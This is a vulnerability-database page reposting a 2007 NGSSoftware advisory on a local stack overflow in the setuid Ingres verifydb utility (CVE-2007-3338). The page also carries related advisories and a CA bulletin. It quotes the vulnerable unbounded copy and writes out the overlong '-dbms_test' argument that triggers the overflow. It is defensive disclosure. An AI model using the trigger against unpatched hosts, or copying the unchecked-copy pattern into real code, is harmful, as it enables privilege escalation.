Search...

Ingres verifydb local stack overflow

2007-06-26T00:00:00

ID SECURITYVULNS:DOC:17342
Type securityvulns
Reporter Securityvulns
Modified 2007-06-26T00:00:00

Description

======= Summary ======= Name: verifydb local stack overflow Release Date: 25 June 2007 Reference: NGS00389 Discover: Chris Anley <chris@ngssoftware.com> Vendor: Ingres Vendor Reference: [Ingres bug 115911, CVE-2007-3338, CAID 35452] Systems Affected: Ingres 2006 9.0.4 and prior Risk: Medium Status: Published

======== TimeLine ======== Discovered: 27 March 2006 Released: 27 March 2006 Approved: 27 March 2006 Reported: 27 March 2006 Fixed: 21 June 2007 Published: 25 June 2007

=========== Description =========== Ingres 2006 is a venerable and functionality-rich RDBMS that has recently been made available under the Gnu Public License (GPL).

There is a stack buffer overflow in the verifydb utility, which is runs as setuid( ingres ) and is accessible to all users by default on unix systems.

================= Technical Details ================= The Ingres verifydb utility parses command line arguments in the duve_get_args function in the file duveutil.c. When an argument of the form -dbms_testAAAAAAAAAAAAAA...<lots of As> is passed, the following code is executed:

        case &#39;d&#39;:       /* debug flag - should be 1st parameter */
            if &#40;MEcmp&#40;&#40;PTR&#41;argv[parmno], &#40;PTR&#41;&quot;-dbms_test&quot;, &#40;u_i2&#41;10&#41;
                ==DU_IDENTICAL &#41;
            {
                char    numbuf[100];    /* scratch pad to read in number*/
                /* the DBMS_TEST flag was specified.  See if a numeric
                ** value was attached to it.  If so, convert to decimal.
                */
                if &#40;argv[parmno][10]&#41;
                {
                    STcopy &#40;&amp;argv[parmno][10], numbuf&#41;;
                    cv_numbuf&#40;numbuf, &amp;duve_cb-&gt;duve_dbms_test&#41;;
                }
                else
                    duve_cb-&gt;duve_dbms_test = -1;
            }
            else
                duve_cb-&gt;duve_debug = TRUE;
            break;

The argument data beyond the string '-dbms_test' is copied into the buffer 'numbuf' using the STcopy function, with no length check of the copied data. This results in variables on the stack being overwritten, including the saved return address.

=============== Fix Information =============== Ingres issued a patch for this issue on the 21st June 2007.

Further details are available at http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp

Note that this issue affects a wide range of Computer Associates products. A list of these products is available at http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778

The affected products are listed below:

Advantage Data Transformer r2.2 AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1 AllFusion Harvest Change Manager r7, r7.1 BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, Linux and Mainframe Linux) BrightStor ARCserve Backup for Laptops and Desktops r11.5 BrightStor Enterprise Backup (Unix only) r10.5 BrightStor Storage Command Center r11.5 BrightStor Storage Resource Manager r11.5 CleverPath Aion Business Rules Expert r10.1 CleverPath Aion Business Process Monitoring r10.1 CleverPath Predictive Analysis Server r3 DocServer 1.1 eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2 eTrust Audit r8 SP2 eTrust Directory r8.1 eTrust IAM Suite r8.0 eTrust IAM Toolkit r8.0, r8.1 eTrust Identity Manager r8.1 eTrust Network Forensics r8.1 eTrust Secure Content Manager r8 eTrust Single Sign-On r7, r8, r8.1 eTrust Web Access Control 1.0 Unicenter Advanced Systems Management r11 Unicenter Asset Intelligence r11 Unicenter Asset Management r11 Unicenter Asset Portfolio Management r11.2.1, r11.3 Unicenter CCS r11 Unicenter Database Command Center r11.1 Unicenter Desktop and Server Management r11 Unicenter Desktop Management Suite r11 Unicenter Enterprise Job Manager r1 SP3, r1 SP4 Unicenter Job Management Option r11 Unicenter Lightweight Portal 2 Unicenter Management Portal r3.1.1 Unicenter Network and Systems Management r3.0, r11 Unicenter Network and Systems Management - Tiered - Multi Platform r3.0 0305, r3.1 0403, r11.0 Unicenter Patch Management r11 Unicenter Remote Control 6, r11 Unicenter Service Accounting r11, r11.1 Unicenter Service Assure r2.2, r11, r11.1 Unicenter Service Catalog r11, r11.1 Unicenter Service Delivery r11.0, r11.1 Unicenter Service Intelligence r11 Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1 Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, r11.1, r11.2 Unicenter Software Delivery r11 Unicenter TNG 2.4, 2.4.2, 2.4.2J Unicenter Workload Control Center r1 SP3, r1 SP4 Unicenter Web Services Distributed Management 3.11, 3.50 Wily SOA Manager 7.1

NGSSoftware Insight Security Research http://www.ngssoftware.com/ http://www.databasesecurity.com/ http://www.nextgenss.com/ +44(0)208 401 0070 -- E-MAIL DISCLAIMER

The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402

JSON Vulners Source

Initial Source

{"id": "SECURITYVULNS:DOC:17342", "bulletinFamily": "software", "title": "Ingres verifydb local stack overflow", "description": "=======\r\nSummary\r\n=======\r\nName: verifydb local stack overflow\r\nRelease Date: 25 June 2007\r\nReference: NGS00389\r\nDiscover: Chris Anley <chris@ngssoftware.com>\r\nVendor: Ingres\r\nVendor Reference: [Ingres bug 115911, CVE-2007-3338, CAID 35452]\r\nSystems Affected: Ingres 2006 9.0.4 and prior\r\nRisk: Medium\r\nStatus: Published\r\n\r\n========\r\nTimeLine\r\n========\r\nDiscovered: 27 March 2006\r\nReleased: 27 March 2006\r\nApproved: 27 March 2006\r\nReported: 27 March 2006\r\nFixed: 21 June 2007\r\nPublished: 25 June 2007\r\n\r\n===========\r\nDescription\r\n===========\r\nIngres 2006 is a venerable and functionality-rich RDBMS that has\r\nrecently been made available under the Gnu Public License (GPL).\r\n\r\nThere is a stack buffer overflow in the verifydb utility, which is runs\r\nas setuid( ingres ) and is accessible to all users by default on unix\r\nsystems.\r\n\r\n=================\r\nTechnical Details\r\n=================\r\nThe Ingres verifydb utility parses command line arguments in the\r\nduve_get_args function in the file duveutil.c. When an argument of the\r\nform\r\n-dbms_testAAAAAAAAAAAAAA...<lots of As> is passed, the following code is\r\nexecuted:\r\n\r\n case 'd': /* debug flag - should be 1st parameter */\r\n if (MEcmp((PTR)argv[parmno], (PTR)"-dbms_test", (u_i2)10)\r\n ==DU_IDENTICAL )\r\n {\r\n char numbuf[100]; /* scratch pad to read in number*/\r\n /* the DBMS_TEST flag was specified. See if a numeric\r\n ** value was attached to it. If so, convert to decimal.\r\n */\r\n if (argv[parmno][10])\r\n {\r\n STcopy (&argv[parmno][10], numbuf);\r\n cv_numbuf(numbuf, &duve_cb->duve_dbms_test);\r\n }\r\n else\r\n duve_cb->duve_dbms_test = -1;\r\n }\r\n else\r\n duve_cb->duve_debug = TRUE;\r\n break;\r\n\r\nThe argument data beyond the string '-dbms_test' is copied into the\r\nbuffer 'numbuf' using the STcopy function, with no length check of the\r\ncopied data. This results in variables on the stack being overwritten,\r\nincluding the saved return address.\r\n\r\n===============\r\nFix Information\r\n===============\r\nIngres issued a patch for this issue on the 21st June 2007.\r\n\r\nFurther details are available at\r\nhttp://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\r\n\r\nNote that this issue affects a wide range of Computer Associates\r\nproducts. A list of these products is available at\r\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778\r\n\r\nThe affected products are listed below:\r\n\r\nAdvantage Data Transformer r2.2\r\nAllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1\r\nAllFusion Harvest Change Manager r7, r7.1\r\nBrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, Linux and\r\nMainframe Linux)\r\nBrightStor ARCserve Backup for Laptops and Desktops r11.5\r\nBrightStor Enterprise Backup (Unix only) r10.5\r\nBrightStor Storage Command Center r11.5\r\nBrightStor Storage Resource Manager r11.5\r\nCleverPath Aion Business Rules Expert r10.1\r\nCleverPath Aion Business Process Monitoring r10.1\r\nCleverPath Predictive Analysis Server r3\r\nDocServer 1.1\r\neTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2\r\neTrust Audit r8 SP2\r\neTrust Directory r8.1\r\neTrust IAM Suite r8.0\r\neTrust IAM Toolkit r8.0, r8.1\r\neTrust Identity Manager r8.1\r\neTrust Network Forensics r8.1\r\neTrust Secure Content Manager r8\r\neTrust Single Sign-On r7, r8, r8.1\r\neTrust Web Access Control 1.0\r\nUnicenter Advanced Systems Management r11\r\nUnicenter Asset Intelligence r11\r\nUnicenter Asset Management r11\r\nUnicenter Asset Portfolio Management r11.2.1, r11.3 Unicenter CCS r11\r\nUnicenter Database Command Center r11.1\r\nUnicenter Desktop and Server Management r11\r\nUnicenter Desktop Management Suite r11\r\nUnicenter Enterprise Job Manager r1 SP3, r1 SP4\r\nUnicenter Job Management Option r11\r\nUnicenter Lightweight Portal 2\r\nUnicenter Management Portal r3.1.1\r\nUnicenter Network and Systems Management r3.0, r11\r\nUnicenter Network and Systems Management - Tiered - Multi Platform r3.0\r\n0305, r3.1 0403, r11.0\r\nUnicenter Patch Management r11\r\nUnicenter Remote Control 6, r11\r\nUnicenter Service Accounting r11, r11.1\r\nUnicenter Service Assure r2.2, r11, r11.1\r\nUnicenter Service Catalog r11, r11.1\r\nUnicenter Service Delivery r11.0, r11.1\r\nUnicenter Service Intelligence r11\r\nUnicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1\r\nUnicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, r11.1,\r\nr11.2\r\nUnicenter Software Delivery r11\r\nUnicenter TNG 2.4, 2.4.2, 2.4.2J\r\nUnicenter Workload Control Center r1 SP3, r1 SP4\r\nUnicenter Web Services Distributed Management 3.11, 3.50\r\nWily SOA Manager 7.1\r\n\r\nNGSSoftware Insight Security Research\r\nhttp://www.ngssoftware.com/\r\nhttp://www.databasesecurity.com/\r\nhttp://www.nextgenss.com/\r\n+44(0)208 401 0070\r\n--\r\nE-MAIL DISCLAIMER\r\n\r\nThe information contained in this email and any subsequent\r\ncorrespondence is private, is solely for the intended recipient(s) and\r\nmay contain confidential or privileged information. For those other than\r\nthe intended recipient(s), any disclosure, copying, distribution, or any\r\nother action taken, or omitted to be taken, in reliance on such\r\ninformation is prohibited and may be unlawful. If you are not the\r\nintended recipient and have received this message in error, please\r\ninform the sender and delete this mail and any attachments.\r\n\r\nThe views expressed in this email do not necessarily reflect NGS policy.\r\nNGS accepts no liability or responsibility for any onward transmission\r\nor use of emails and attachments having left the NGS domain.\r\n\r\nNGS and NGSSoftware are trading names of Next Generation Security\r\nSoftware Ltd. Registered office address: 52 Throwley Way, Sutton, SM1\r\n4BF with Company Number 04225835 and VAT Number 783096402", "published": "2007-06-26T00:00:00", "modified": "2007-06-26T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17342", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2007-3338"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:22", "edition": 1, "viewCount": 6, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2018-08-31T11:10:22", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-3338"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:17327", "SECURITYVULNS:DOC:17343", "SECURITYVULNS:VULN:7841"]}, {"type": "osvdb", "idList": ["OSVDB:37484", "OSVDB:37483"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DAAC4C42D5378F08D46B31B383CA6A3B", "EXPLOITPACK:215A9E0E73AB212DC489033AC4E72DB6"]}, {"type": "seebug", "idList": ["SSV:69601", "SSV:83664"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:92818"]}], "modified": "2018-08-31T11:10:22", "rev": 2}, "vulnersScore": 7.0}, "affectedSoftware": []}

{"cve": [{"lastseen": "2021-02-02T05:31:24", "description": "Multiple stack-based buffer overflows in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (Computer Associates) products, allow remote attackers to execute arbitrary code via the (1) uuid_from_char or (2) duve_get_args functions.", "edition": 4, "cvss3": {}, "published": "2007-06-22T18:30:00", "title": "CVE-2007-3338", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-3338"], "modified": "2018-10-16T16:48:00", "cpe": ["cpe:/a:ingres:database_server:r3", "cpe:/a:ingres:database_server:9.0.4", "cpe:/a:ingres:database_server:2.6", "cpe:/a:ingres:database_server:2.5"], "id": "CVE-2007-3338", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3338", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:ingres:database_server:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:ingres:database_server:9.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:ingres:database_server:r3:*:*:*:*:*:*:*", "cpe:2.3:a:ingres:database_server:2.6:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-3338"], "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451\nVendor Specific News/Changelog Entry: http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778\nVendor Specific News/Changelog Entry: http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\n[Secunia Advisory ID:25775](https://secuniaresearch.flexerasoftware.com/advisories/25775/)\n[Secunia Advisory ID:25756](https://secuniaresearch.flexerasoftware.com/advisories/25756/)\n[Related OSVDB ID: 37486](https://vulners.com/osvdb/OSVDB:37486)\n[Related OSVDB ID: 37487](https://vulners.com/osvdb/OSVDB:37487)\n[Related OSVDB ID: 37484](https://vulners.com/osvdb/OSVDB:37484)\n[Related OSVDB ID: 37485](https://vulners.com/osvdb/OSVDB:37485)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0284.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0303.html\nKeyword: NGS00388\nKeyword: CAID 35452\nKeyword: Ingres bug 115911\nISS X-Force ID: 34995\nISS X-Force ID: 34998\nFrSIRT Advisory: ADV-2007-2290\nFrSIRT Advisory: ADV-2007-2288\n[CVE-2007-3338](https://vulners.com/cve/CVE-2007-3338)\n", "edition": 1, "modified": "2007-06-25T15:10:50", "published": "2007-06-25T15:10:50", "href": "https://vulners.com/osvdb/OSVDB:37483", "id": "OSVDB:37483", "title": "Ingres Database uuid_from_char Function Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-3338"], "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451\nVendor Specific News/Changelog Entry: http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778\nVendor Specific News/Changelog Entry: http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\n[Secunia Advisory ID:25775](https://secuniaresearch.flexerasoftware.com/advisories/25775/)\n[Secunia Advisory ID:25756](https://secuniaresearch.flexerasoftware.com/advisories/25756/)\n[Related OSVDB ID: 37486](https://vulners.com/osvdb/OSVDB:37486)\n[Related OSVDB ID: 37483](https://vulners.com/osvdb/OSVDB:37483)\n[Related OSVDB ID: 37487](https://vulners.com/osvdb/OSVDB:37487)\n[Related OSVDB ID: 37485](https://vulners.com/osvdb/OSVDB:37485)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0284.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0299.html\nKeyword: NGS00389\nKeyword: CAID 35452\nISS X-Force ID: 34995\nISS X-Force ID: 34998\nFrSIRT Advisory: ADV-2007-2290\nFrSIRT Advisory: ADV-2007-2288\n[CVE-2007-3338](https://vulners.com/cve/CVE-2007-3338)\n", "edition": 1, "modified": "2007-06-25T15:10:50", "published": "2007-06-25T15:10:50", "href": "https://vulners.com/osvdb/OSVDB:37484", "id": "OSVDB:37484", "title": "Ingres Database verifydb Utility duveutil.c duve_get_args Function Local Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:22", "bulletinFamily": "software", "cvelist": ["CVE-2007-3338"], "description": "=======\r\nSummary\r\n=======\r\nName: Stack overflow in uuid_from_char function\r\nRelease Date: 25 June 2007\r\nReference: NGS00388\r\nDiscover: Chris Anley <chris@ngssoftware.com>\r\nVendor: Ingres\r\nVendor Reference: [Ingres bug 115911, CVE-2007-3338, CAID 35452]\r\nSystems Affected: Ingres 2006 9.0.4 and prior\r\nRisk: High\r\nStatus: Published\r\n\r\n========\r\nTimeLine\r\n========\r\nDiscovered: 27 March 2006\r\nReleased: 27 March 2006\r\nApproved: 27 March 2006\r\nReported: 27 March 2006\r\nFixed: 21 June 2007\r\nPublished: 25 June 2007\r\n\r\n===========\r\nDescription\r\n===========\r\nIngres 2006 is a venerable and functionality-rich RDBMS that has\r\nrecently been made available under the Gnu Public License (GPL).\r\nThere is a stack buffer overflow in the uuid_from_char function, which\r\nis accessible to all authenticated database users.\r\n\r\n=================\r\nTechnical Details\r\n=================\r\nThe Ingres SQL function uuid_from_char() creates a UUID from the\r\ncharacter string representation of a UUID, e.g.\r\n\r\nselect uuid_from_char('11111111-2222-3333-4444-555555555555')\r\n\r\nIf uuid_from_char is passed a long string as its argument, a stack\r\nbuffer is overflowed and the saved return address can be overwritten,\r\nredirecting the path of execution to the address of the attacker's choice.\r\n\r\n===============\r\nFix Information\r\n===============\r\nIngres issued a patch for this issue on the 21st June 2007.\r\n\r\nFurther details are available at\r\nhttp://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\r\n\r\nNote that this issue affects a wide range of Computer Associates products.\r\nA list of these products is available at\r\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778\r\n\r\nThe affected products are listed below:\r\n\r\nAdvantage Data Transformer r2.2\r\nAllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1\r\nAllFusion Harvest Change Manager r7, r7.1\r\nBrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, Linux and\r\nMainframe Linux)\r\nBrightStor ARCserve Backup for Laptops and Desktops r11.5\r\nBrightStor Enterprise Backup (Unix only) r10.5\r\nBrightStor Storage Command Center r11.5\r\nBrightStor Storage Resource Manager r11.5\r\nCleverPath Aion Business Rules Expert r10.1\r\nCleverPath Aion Business Process Monitoring r10.1\r\nCleverPath Predictive Analysis Server r3\r\nDocServer 1.1\r\neTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2\r\neTrust Audit r8 SP2\r\neTrust Directory r8.1\r\neTrust IAM Suite r8.0\r\neTrust IAM Toolkit r8.0, r8.1\r\neTrust Identity Manager r8.1\r\neTrust Network Forensics r8.1\r\neTrust Secure Content Manager r8\r\neTrust Single Sign-On r7, r8, r8.1\r\neTrust Web Access Control 1.0\r\nUnicenter Advanced Systems Management r11\r\nUnicenter Asset Intelligence r11\r\nUnicenter Asset Management r11\r\nUnicenter Asset Portfolio Management r11.2.1, r11.3 Unicenter CCS r11\r\nUnicenter Database Command Center r11.1\r\nUnicenter Desktop and Server Management r11\r\nUnicenter Desktop Management Suite r11\r\nUnicenter Enterprise Job Manager r1 SP3, r1 SP4\r\nUnicenter Job Management Option r11\r\nUnicenter Lightweight Portal 2\r\nUnicenter Management Portal r3.1.1\r\nUnicenter Network and Systems Management r3.0, r11\r\nUnicenter Network and Systems Management - Tiered - Multi Platform r3.0\r\n0305, r3.1 0403, r11.0\r\nUnicenter Patch Management r11\r\nUnicenter Remote Control 6, r11\r\nUnicenter Service Accounting r11, r11.1\r\nUnicenter Service Assure r2.2, r11, r11.1\r\nUnicenter Service Catalog r11, r11.1\r\nUnicenter Service Delivery r11.0, r11.1\r\nUnicenter Service Intelligence r11\r\nUnicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1\r\nUnicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, r11.1,\r\nr11.2\r\nUnicenter Software Delivery r11\r\nUnicenter TNG 2.4, 2.4.2, 2.4.2J\r\nUnicenter Workload Control Center r1 SP3, r1 SP4\r\nUnicenter Web Services Distributed Management 3.11, 3.50\r\nWily SOA Manager 7.1\r\n\r\nNGSSoftware Insight Security Research\r\nhttp://www.ngssoftware.com/\r\nhttp://www.databasesecurity.com/\r\nhttp://www.nextgenss.com/\r\n+44(0)208 401 0070\r\n--\r\nE-MAIL DISCLAIMER\r\n\r\nThe information contained in this email and any subsequent\r\ncorrespondence is private, is solely for the intended recipient(s) and\r\nmay contain confidential or privileged information. For those other than\r\nthe intended recipient(s), any disclosure, copying, distribution, or any\r\nother action taken, or omitted to be taken, in reliance on such\r\ninformation is prohibited and may be unlawful. If you are not the\r\nintended recipient and have received this message in error, please\r\ninform the sender and delete this mail and any attachments.\r\n\r\nThe views expressed in this email do not necessarily reflect NGS policy.\r\nNGS accepts no liability or responsibility for any onward transmission\r\nor use of emails and attachments having left the NGS domain.\r\n\r\nNGS and NGSSoftware are trading names of Next Generation Security\r\nSoftware Ltd. Registered office address: 52 Throwley Way, Sutton, SM1\r\n4BF with Company Number 04225835 and VAT Number 783096402", "edition": 1, "modified": "2007-06-26T00:00:00", "published": "2007-06-26T00:00:00", "id": "SECURITYVULNS:DOC:17343", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17343", "title": "Ingres stack overflow in uuid_from_char function", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:22", "bulletinFamily": "software", "cvelist": ["CVE-2007-3334", "CVE-2007-3336", "CVE-2007-3337", "CVE-2007-3338"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nTitle: [CAID 35450, 35451, 35452, 35453]: CA Products That Embed \r\nIngres Multiple Vulnerabilities\r\n\r\nCA Vuln ID (CAID): 35450, 35451, 35452, 35453\r\n\r\nCA Advisory Date: 2007-06-21\r\n\r\nReported By: NGSSoftware, and iDefense\r\n\r\nImpact: Attackers can potentially execute arbitrary code, or \r\noverwrite files.\r\n\r\nSummary: Various CA products that embed Ingres products contain \r\nmultiple vulnerabilities that can allow an attacker to potentially \r\nexecute arbitrary code. CA has issued fixes, to address all of \r\nthese vulnerabilities, for all supported CA products that may be \r\naffected.\r\n\r\n1) Ingres controllable pointer overwrite vulnerability (reported \r\nby NGSSoftware) [Ingres bug 115927, CVE-2007-3336, CAID 35450]\r\nDescription: An unauthenticated attacker can potentially execute \r\narbitrary code within the context of the database server.\r\n\r\n2) Ingres remote unauthenticated pointer overwrite #2 (reported by \r\nNGSSoftware) [Ingres bug 115927, CVE-2007-3336, CAID 35450]\r\nDescription: An unauthenticated attacker can exploit a pointer \r\noverwrite vulnerability to execute arbitrary code within the \r\ncontext of the database server.\r\n\r\n3) Ingres wakeup file overwrite (reported by NGSSoftware) \r\n[Ingres bug 115913, CVE-2007-3337, CAID 35451]\r\nDescription: The "wakeup" binary creates a file named \r\n"alarmwkp.def" in the current directory, truncating the file if it \r\nalready exists. The "wakeup" binary is setuid "ingres" and \r\nworld-executable. Consequently, an attacker can truncate a file \r\nwith the privileges of the "ingres" user.\r\n\r\n4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) \r\n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\r\nDescription: An attacker can pass a long string as an argument to \r\nuuid_from_char() to cause a stack buffer overflow and the saved \r\nreturned address can be overwritten.\r\n\r\n5) Ingres verifydb local stack overflow (reported by NGSSoftware) \r\n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\r\nDescription: A local attacker can exploit a stack overflow in the \r\nIngres verifydb utility duve_get_args function.\r\n\r\n6) Communication server heap corruption (reported by iDefense) \r\n[Ingres bug 117523, CVE-2007-3334, CAID 35453]\r\nDescription: An attacker can execute arbitrary code within the \r\ncontext of the communications server (iigcc.exe). This only \r\naffects Ingres on the Windows operating system. Reported by \r\niDefense as IDEF2023.\r\n\r\n7) Data Access/JDBC server heap corruption (reported by iDefense) \r\n[Ingres bug 117523, CVE-2007-3334, CAID 35453]\r\nDescription: An attacker can execute arbitrary code within the \r\ncontext of the Data Access server (iigcd.exe) in r3 or the JDCB \r\nserver in older releases. This only affects Ingres on the Windows \r\noperating system. Reported by iDefense as IDEF2022.\r\n\r\nMitigating Factors: None\r\n\r\nSeverity: CA has given these vulnerabilities a cumulative High \r\nrisk rating.\r\n\r\nAffected Products:\r\nAdvantage Data Transformer r2.2\r\nAllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1\r\nAllFusion Harvest Change Manager r7, r7.1\r\nBrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, \r\n Linux and Mainframe Linux)\r\nBrightStor ARCserve Backup for Laptops and Desktops r11.5\r\nBrightStor Enterprise Backup (Unix only) r10.5\r\nBrightStor Storage Command Center r11.5\r\nBrightStor Storage Resource Manager r11.5\r\nCleverPath Aion Business Rules Expert r10.1\r\nCleverPath Aion Business Process Monitoring r10.1\r\nCleverPath Predictive Analysis Server r3\r\nDocServer 1.1\r\neTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2\r\neTrust Audit r8 SP2\r\neTrust Directory r8.1\r\neTrust IAM Suite r8.0\r\neTrust IAM Toolkit r8.0, r8.1\r\neTrust Identity Manager r8.1\r\neTrust Network Forensics r8.1\r\neTrust Secure Content Manager r8\r\neTrust Single Sign-On r7, r8, r8.1\r\neTrust Web Access Control 1.0\r\nUnicenter Advanced Systems Management r11\r\nUnicenter Asset Intelligence r11\r\nUnicenter Asset Management r11\r\nUnicenter Asset Portfolio Management r11.2.1, r11.3\r\nUnicenter CCS r11\r\nUnicenter Database Command Center r11.1\r\nUnicenter Desktop and Server Management r11\r\nUnicenter Desktop Management Suite r11\r\nUnicenter Enterprise Job Manager r1 SP3, r1 SP4\r\nUnicenter Job Management Option r11\r\nUnicenter Lightweight Portal 2\r\nUnicenter Management Portal r3.1.1\r\nUnicenter Network and Systems Management r3.0, r11\r\nUnicenter Network and Systems Management - Tiered - Multi Platform \r\n r3.0 0305, r3.1 0403, r11.0\r\nUnicenter Patch Management r11\r\nUnicenter Remote Control 6, r11\r\nUnicenter Service Accounting r11, r11.1\r\nUnicenter Service Assure r2.2, r11, r11.1\r\nUnicenter Service Catalog r11, r11.1\r\nUnicenter Service Delivery r11.0, r11.1\r\nUnicenter Service Intelligence r11\r\nUnicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1\r\nUnicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, \r\n r11.1, r11.2\r\nUnicenter Software Delivery r11\r\nUnicenter TNG 2.4, 2.4.2, 2.4.2J\r\nUnicenter Workload Control Center r1 SP3, r1 SP4\r\nUnicenter Web Services Distributed Management 3.11, 3.50\r\nWily SOA Manager 7.1\r\n\r\nAffected Platforms:\r\nAll operating system platforms supported by the various CA \r\nproducts that embed Ingres. This includes Windows, Linux, and \r\nsupported UNIX platforms.\r\n\r\nStatus and Recommendation:\r\nCA recommends that customers apply the appropriate fix(es) listed \r\non the Security Notice page: \r\nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotic\r\ne.asp\r\n\r\nWorkaround: None\r\n\r\nReferences (URLs may wrap):\r\nCA SupportConnect:\r\nhttp://supportconnect.ca.com/\r\nCA SupportConnect Security Notice for these vulnerabilities:\r\nIngres Security Alert\r\nhttp://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\r\nImportant Security Notice for Customers Using Products That Embed \r\nIngres\r\nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotic\r\ne.asp\r\nCA Security Advisor posting: \r\nCA Products That Embed Ingres Multiple Vulnerabilities\r\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778\r\nCA Vuln ID (CAID): 35450, 35451, 35452, 35453\r\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450\r\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451\r\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452\r\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453\r\nIngres knowledge base 